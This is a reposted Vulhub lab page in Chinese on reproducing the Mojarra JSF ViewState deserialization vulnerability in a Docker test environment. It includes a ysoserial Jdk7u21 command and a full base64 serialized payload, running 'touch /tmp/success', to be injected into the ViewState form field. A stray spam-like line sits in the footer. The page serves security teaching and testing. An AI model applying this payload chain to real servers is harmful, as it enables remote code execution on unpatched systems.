<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>
    Vulhub 文檔
    展開或關閉
    介紹
    GETTING STARTED USAGE ADVANCE 捐助
    漏洞環境
    AppWeb認證繞過漏洞(CVE-2018-8715) ActiveMQ 反序列化漏洞(CVE-2015-5254) ActiveMQ任意文件寫入漏洞(CVE-2016-3088) Apache HTTPD 換行解析漏洞(CVE-2017-15715) Apache HTTPD 多后綴解析漏洞 Apache SSI 遠程命令執行漏洞 Aria2 任意文件寫入漏洞 Adobe ColdFusion 文件讀取漏洞(CVE-2010-2861) Adobe ColdFusion 反序列化漏洞(CVE-2017-3066) Atlassian Confluence 路徑穿越與命令執行漏洞(CVE-2019-3396) Couchdb 垂直權限繞過漏洞(CVE-2017-12635) Couchdb 任意命令執行漏洞(CVE-2017-12636) Discuz 7.x/6.x 全局變量防御繞過導致代碼執行 Discuz!X ≤3.4 任意文件刪除漏洞 Django debug page XSS漏洞(CVE-2017-12794) Django < 2.0.8 任意URL跳轉漏洞(CVE-2018-14574) Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234) Django GIS SQL注入漏洞(CVE-2020-9402) DNS域傳送漏洞 docker daemon api 未授權訪問漏洞 Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704) Drupal Core 8 PECL YAML 反序列化任意代碼執行漏洞(CVE-2017-6920) Drupal Drupalgeddon 2 遠程代碼執行漏洞(CVE-2018-7600) Drupal 遠程代碼執行漏洞(CVE-2018-7602) Drupal 遠程代碼執行漏洞(CVE-2019-6339) Drupal XSS漏洞(CVE-2019-6341) ECShop 2.x/3.x SQL注入/任意代碼執行漏洞 ElasticSearch 命令執行漏洞(CVE-2014-3120)測試環境 ElasticSearch Groovy 沙盒繞過 && 代碼執行漏洞(CVE-2015-1427)測試環境 ElasticSearch 目錄穿越漏洞(CVE-2015-3337)測試環境 ElasticSearch 目錄穿越漏洞(CVE-2015-5531) Elasticsearch寫入webshell漏洞(WooYun-2015-110216) electron 遠程命令執行漏洞(CVE-2018-1000006) Electron WebPreferences 遠程命令執行漏洞(CVE-2018-15685) fastjson 1.2.24 反序列化導致任意命令執行漏洞 Fastjson 1.2.47 遠程命令執行漏洞 ffmpeg 任意文件讀取漏洞/SSRF漏洞 (CVE-2016-1897/CVE-2016-1898) ffmpeg 任意文件讀取漏洞環境 Flask(Jinja2) 服務端模板注入漏洞 PHP-FPM Fastcgi 未授權訪問漏洞 GhostScript 沙箱繞過(命令執行)漏洞(CVE-2018-16509) GhostScript 沙箱繞過(命令執行)漏洞(CVE-2018-19475) GhostScript 沙箱繞過(命令執行)漏洞(CVE-2019-6116) GIT-SHELL 沙盒繞過(CVE-2017-8386) Gitea 1.4.0 目錄穿越導致命令執行漏洞 gitlist 0.6.0 遠程命令執行漏洞 GlassFish 任意文件讀取漏洞 GoAhead 遠程命令執行漏洞(CVE-2017-17562) Gogs 任意用戶登錄漏洞(CVE-2018-18925) H2 Database Console 未授權訪問 Hadoop YARN ResourceManager 未授權訪問 OpenSSH 用戶名枚舉漏洞(CVE-2018-15473) 心臟出血漏洞(CVE-2014-0160) HTTPoxy漏洞(CVE-2016-5385 Imagetragick 命令執行漏洞(CVE-2016–3714) influxdb未授權訪問漏洞 Jackson-databind 反序列化漏洞(CVE-2017-7525) Java RMI codebase 遠程代碼執行漏洞 (待完善) Boss JMXInvokerServlet 反序列化漏洞 JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149) JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504) enkins-CI 遠程代碼執行漏洞(CVE-2017-1000353) Jenkins遠程命令執行漏洞(CVE-2018-1000861) Atlassian Jira 模板注入漏洞(CVE-2019-11581) Jmeter RMI 反序列化命令執行漏洞(CVE-2018-1297) Joomla 3.4.5 反序列化漏洞(CVE-2015-8562) Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞環境 Jupyter Notebook 未授權訪問漏洞 Kibana Local File Inclusion (CVE-2018-17246) Kibana 原型鏈污染導致任意代碼執行漏洞 (CVE-2019-7609) libssh 服務端權限認證繞過漏洞(CVE-2018-10933) Liferay Portal CE 反序列化命令執行漏洞(CVE-2020-7961) Apache Log4j Server 反序列化命令執行漏洞(CVE-2017-5645) Magento 2.2 SQL注入漏洞 mini_httpd任意文件讀取漏洞(CVE-2018-18778) mongo-express 遠程代碼執行漏洞(CVE-2019-10758) Mysql 身份認證繞過漏洞(CVE-2012-2122) Nexus Repository Manager 3 遠程命令執行漏洞(CVE-2019-7238) Nexus Repository Manager 3 遠程命令執行漏洞(CVE-2020-10199) Nexus Repository Manager 3 遠程命令執行漏洞(CVE-2020-10204) Nginx 文件名邏輯漏洞(CVE-2013-4547) Nginx越界讀取緩存漏洞(CVE-2017-7529) Nginx 配置錯誤導致漏洞 Nginx 解析漏洞復現 Node.js 目錄穿越漏洞(CVE-2017-14849) node-postgres 代碼執行漏洞(CVE-2017-16082) PHP-CGI遠程代碼執行漏洞(CVE-2012-1823) PHP imap 遠程命令執行漏洞(CVE-2018-19518) PHP-FPM 遠程代碼執行漏洞(CVE-2019-11043) PHP文件包含漏洞(利用phpinfo) PHP環境 XML外部實體注入漏洞(XXE) XDebug 遠程調試漏洞(代碼執行) PHPMailer 任意文件讀取漏洞(CVE-2017-5223) phpmyadmin 4.8.1 遠程文件包含漏洞(CVE-2018-12613) phpMyAdmin 4.0.x—4.6.2 遠程代碼執行漏洞(CVE-2016-5734) phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433) phpunit 遠程代碼執行漏洞(CVE-2017-9841) PostgreSQL 提權漏洞(CVE-2018-1058) PostgreSQL 高權限命令執行漏洞(CVE-2019-9193) Python PIL 遠程命令執行漏洞(GhostButt)CVE-2017-8291 Python unpickle 造成任意命令執行漏洞 Ruby On Rails 路徑穿越漏洞(CVE-2018-3760) Ruby on Rails 路徑穿越與任意文件讀取漏洞(CVE-2019-5418) SaltStack 水平權限繞過漏洞(CVE-2020-11651) SaltStack 任意文件讀寫漏洞(CVE-2020-11652) Redis 4.x/5.x 未授權訪問漏洞 rsync 未授權訪問漏洞 Ruby Net::FTP 模塊命令注入漏洞(CVE-2017-17405) Samba 遠程命令執行漏洞(CVE-2017-7494) Scrapyd未經身份驗證的遠程代碼執行(Scrapyd Unauthenticated Remote Code Execution) Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437) Shellshock 破殼漏洞(CVE-2014-6271) Apache solr XML 實體注入漏洞(CVE-2017-12629) Apache Solr 遠程命令執行漏洞(CVE-2017-12629) Apache Solr 遠程命令執行漏洞(CVE-2019-0193) Apache Solr Velocity 注入遠程命令執行漏洞 (CVE-2019-17558) Apache Spark 未授權訪問漏洞 Spring Security OAuth2 遠程命令執行漏洞(CVE-2016-4977) Spring WebFlow 遠程代碼執行漏洞(CVE-2017-4971) Spring Data Rest 遠程命令執行漏洞(CVE-2017-8046) Spring Messaging 遠程命令執行漏洞(CVE-2018-1270) Spring Data Commons 遠程命令執行漏洞(CVE-2018-1273) S2-001 遠程代碼執行漏洞 S2-005 遠程代碼執行漏洞 S2-007 遠程代碼執行漏洞 S2-008 遠程代碼執行漏洞 (CVE-2012-0391) S2-009 遠程代碼執行漏洞 (CVE-2011-3923) S2-012 遠程代碼執行漏洞 (CVE-2013-1965) S2-013/S2-014 遠程代碼執行漏洞 (CVE-2013-1966) S2-015 遠程代碼執行漏洞 (CVE-2013-2134, CVE-2013-2135) S2-016 遠程代碼執行漏洞 (CVE-2013-2251) S2-045 遠程代碼執行漏洞(CVE-2017-5638) S2-046 遠程代碼執行漏洞(CVE-2017-5638) S2-048 遠程代碼執行漏洞 (CVE-2017-9791) S2-052 遠程代碼執行漏洞 (CVE-2017-9805) S2-053 遠程代碼執行漏洞 (CVE-2017-12611) Struts2 S2-057 遠程代碼執行漏洞 (CVE-2018-11776) Supervisord 遠程命令執行漏洞(CVE-2017-11610) ThinkPHP 2.x 任意代碼執行漏洞 ThinkPHP5 5.0.22/5.1.29 遠程代碼執行漏洞 ThinkPHP5 5.0.23 遠程代碼執行漏洞 ThinkPHP5 SQL注入漏洞 && 敏感信息泄露 Tomcat PUT方法任意寫文件漏洞(CVE-2017-12615) Aapache Tomcat AJP 文件包含漏洞(CVE-2020-1938) Tomcat7+ 弱口令 && 后臺getshell漏洞 uWSGI PHP目錄穿越漏洞(CVE-2018-7490) uWSGI 未授權訪問漏洞 Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271) Weblogic WLS Core Components 反序列化命令執行漏洞(CVE-2018-2628) Weblogic SSRF漏洞 Weblogic 任意文件上傳漏洞(CVE-2018-2894) Weblogic 常規滲透測試環境 Webmin 遠程命令執行漏洞(CVE-2019-15107) Wordpress 4.6 任意命令執行漏洞(PwnScriptum) zabbix latest.php SQL注入漏洞(CVE-2016-10134) Apereo CAS 4.1 反序列化命令執行漏洞 Mojarra JSF ViewState 反序列化漏洞

    Mojarra JSF ViewState 反序列化漏洞

    Vulhub 文檔 /

    Mojarra JSF ViewState 反序列化漏洞

    JavaServer Faces (JSF) 是一種用于構建 Web 應用程序的標準,Mojarra是一個實現了JSF的框架。在其2.1.29-08、2.0.11-04版本之前,沒有對JSF中的ViewState進行加密,進而導致攻擊者可以構造惡意的序列化ViewState對象對服務器進行攻擊。

    參考鏈接:

    環境搭建

    執行如下命令啟動一個使用了JDK7u21和mojarra 2.1.28的JSF應用:

    docker-compose up -d

    環境啟動后,訪問http://your-ip:8080即可查看到demo頁面。

    漏洞復現

    JSF的ViewState結構如下:

    根據這個結構,我們使用ysoserial的Jdk7u21利用鏈來生成一段合法的Payload:

    $ java -jar ysoserial-master-SNAPSHOT.jar Jdk7u21 "touch /tmp/success" | gzip | base64 -w 0
H4sIAAVGF18AA61WzW8bRRR/Yye2Y9zmo/lsaZvQlnxAd/PlJsURbT5Ia3BIhNNUwocwXk/sbde7293ZZINEb/wBCJX/AJBoOPRCqx6QKm4tFyQkUFEluHADDhUSFz7e7G5iKwnYLV1pd2bf17z35jdv3tYv0Ghb0HWFrlPJ4aomZVT9KitcpHYpy/j32ndv33g0dCwE4FrQWpEK+Hfn3r/x0Z3b42HkmxsJAGg5dx7EE0KrryhGWbIdXTKsokRNqpSY5FKN6pKqc2bpVJNcW+OKxC3qSsusbGqUMzuNY9PlxXv61s2xMETScGBV1QtM52865Tyz0nBwFRV0W2M8jXQ3B/HV/CZnilFgNodwLjeTg8iqolEbf9tyGeG2jMsW5VlBS2WgcVWnZYbMKl6WW6peRGbrquFw0+FLlmEyi6vCaKcvKGKXK/SUa4pY/8bHsbyF3/izp6NY/GFCJEzwQkgP5Wa2Hnf9EYkt/xiQI5/d/+vul8gehbNxCMMLUZiIwqkovEigxWaWSrUVZtmqoV9KzxEgrxM4MGvoNqc6X6Gawxo/7/3w8QePfnuVQGRK1VWOk/DA4AqBhlnMAoFm3Ebm52uZ5jWktGUMBc1SNI7/AbGBl1SbwKEsd/LLQU6X6KZm0AKBRFrXmeWljKFQMrNpG75zsunL2H5CLtBCkXH75D5WUgSavM1aM6wyAWsgg5iQERMyYkL2MSF7mJC3MSF7mJDnFhdSuX2ly1pF1vdHfZdZcjaYUo55u0j1gsaslEhJrGAoThnxQ+D0Ey2PqiXfDoY/8/+dIRB/zVWYKWh2FPoJfPJk+ajpQYGX5bnlhWlXtdNIotywaivVlUM1MCdw8DReEIgGuSQw/SwymTUcS2HzqoBxIkCgJA5pAuLwXBQGCIw9BWAJnK93RyxH52qZydN5GyGu8G1LBNq9YqEaFee903a2XsvblnbQQuB4jVhwi6YULSgFrZWq9pbvZBSGMGcoGPwT6BgYzOwRSyXgZTgdh5dAworBDUcp9cq8bKLXisJsOwbDWDSYyxQC/QN7i2e1SSyTQgVNjsKYMDmOVSzLqXJ1gZpB/amKamkDi83oxPBIMpmcnBgZGR8Zm0CNvkwNkRT0QQhrKPqF72FohAiOUVF7IebREA74FZeTjCPBsXHoNpBbnsgB/EY8ogwH8ZvwBaAZJnHE0gjtKCWUz+EbFrTdiuOeYq/PDBTFrAM6PT6BLuhGjR6c+z4Ks0cCs2mPuo/ZSc/skM/c1+zzcBQ1xOwYHMflKwvEYHAn6JPIEVLNn0KYZO6A3DbyBSQv3/IUz3hBESHR663fB604xpEVghPQAk3ONbiOtoB8u3NnHRF3VkcUuqLQHYWeeu+saz+rv06VL3Q/mzsrPG8Ye+6oUzXvKNSqp3ocJnCiDlMYegXwi/krTPn301/rBP8njkn9OJ7aheM2j3/I+7ZX7W6n2F2TQwMeK8vcIODa73mYOCr8dyUsyNLO1V3pztztblHELFlsTcOgJTzs7uZP/Q97v26ZfRACkgFS4rgdlewEknJaX8dNrS7mrom94qjoE7etUV03uCcjTe9M9yheuv97c8eD6x+HIJSBRJkJ4HhIw36tuapfw3KDXV0D3zSx42vd0w16y+9qbVGlMfrw3led73yDR2Me4mK75rHGG9h+NvGSxeySoRVcM+h2Exsx0fuK9HGIrSVpkp4ZnhQnJ+auWzUyCpXHNd1/AEKwhdeSCwAA

    然后,我們提交表單并抓包,修改其中javax.faces.ViewState字段的值為上述Payload(別忘了URL編碼):

    touch /tmp/success已成功執行:

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    GQQQy
    資深作者 200 聲望
    老年二進制選手,副業虛擬機
    討論數量: 0
    只看當前版本


    暫無話題~
    ? 2021 WANGAN.COM 幫助網安從業者成長;關注產業發展,做網絡安全忠誠衛士!
    亚洲 欧美 自拍 唯美 另类